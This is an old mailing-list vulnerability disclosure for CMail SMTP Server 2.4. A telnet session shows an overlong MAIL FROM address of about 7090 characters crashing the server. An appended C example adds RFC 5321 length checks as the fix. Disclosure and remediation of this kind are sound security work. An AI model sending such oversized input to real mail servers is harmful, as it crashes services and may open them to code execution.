Vulnerability in CMail SMTP Server Version 2.4: Remotely

From: Luciano Martins (luckat_private)
Date: Thu Jul 29 1999 - 03:27:45 PDT


    We found a buffer overflow in the CMail SMTP service (long MAIL FROM:) that
    may allow an attacker to execute arbitrary code on the target server. It is
    based on the overflows eEye pointed out in cmail 2.3 >:-] Which was never
    fixed... software vendors still not taking security issues seriously.
    
    
    Example:
    
    
    [cham@guilt cham]$ telnet example.com 25
    Trying example.com...
    Connected to example.com.
    Escape character is '^]'.
    220  SMTP services ready. Computalynx CMail Server Version: 2.4
    helo ussr
    250 Hello ussr [yourip], how are you today?
    MAIL FROM: cmail <[buffer]@cmaildotcom.com>
    
    Where [buffer] is approx. 7090 characters. At this point the server overflows
    and crashes. Just a typical buffer overflow that should have been fixed in
    version 2.3 when it was pointed out to them.
    
    
    Luck Martins
    
    u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
    WWW.USSRBACK.COM
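
An added example, not part of the original post and not CMail's code: a length-checked MAIL FROM parser showing the server-side bounds check whose absence the report describes. The function names, status values and the `example.com` sample line are assumptions made for illustration; the two limits are the command-line and path maxima from RFC 5321.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define SMTP_LINE_MAX 512 /* RFC 5321 4.5.3.1.4: command line, CRLF included */
#define SMTP_PATH_MAX 256 /* RFC 5321 4.5.3.1.3: path, "<" and ">" included */
enum mf_status { MF_OK, MF_SYNTAX, MF_LINE_TOO_LONG, MF_PATH_TOO_LONG };

/* line/len: one received command without its CRLF. addr receives the
 * NUL-terminated reverse-path; the copy is checked against addr_sz. */
enum mf_status parse_mail_from(const char *line, size_t len,
                               char *addr, size_t addr_sz)
{
    static const char verb[] = "MAIL FROM:";
    const size_t vlen = sizeof verb - 1;
    const char *lt, *gt;
    size_t i, n;

    if (addr_sz == 0) return MF_SYNTAX;
    addr[0] = '\0';
    if (len > SMTP_LINE_MAX - 2) return MF_LINE_TOO_LONG; /* reject before parsing */
    if (len < vlen) return MF_SYNTAX;
    for (i = 0; i < vlen; i++)
        if (toupper((unsigned char)line[i]) != verb[i]) return MF_SYNTAX;
    lt = memchr(line + vlen, '<', len - vlen);
    gt = lt ? memchr(lt + 1, '>', (size_t)(line + len - (lt + 1))) : NULL;
    if (gt == NULL) return MF_SYNTAX;
    n = (size_t)(gt - lt) - 1;             /* octets between < and > */
    if (n + 2 > SMTP_PATH_MAX || n >= addr_sz) return MF_PATH_TOO_LONG;
    memcpy(addr, lt + 1, n);               /* n < addr_sz is guaranteed here */
    addr[n] = '\0';
    return MF_OK;
}

/* Constructed input: "MAIL FROM: cmail <aaa...@example.com>", n 'a' octets. */
static char demo_addr[SMTP_PATH_MAX];
enum mf_status try_local_part(size_t n)
{
    static char line[8192];
    size_t len = (size_t)snprintf(line, sizeof line, "MAIL FROM: cmail <");

    if (n > 8000) return MF_SYNTAX;        /* keep the demo inside line[] */
    memset(line + len, 'a', n);
    len += n;
    len += (size_t)snprintf(line + len, sizeof line - len, "@example.com>");
    return parse_mail_from(line, len, demo_addr, sizeof demo_addr);
}

int main(void) {
    printf("7090-octet local part: status %d\n", (int)try_local_part(7090));
    return 0;
}
```

The receive loop that feeds this parser has to cap how many octets it buffers per line as well, so that an oversized command is refused before it is ever stored whole.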
    


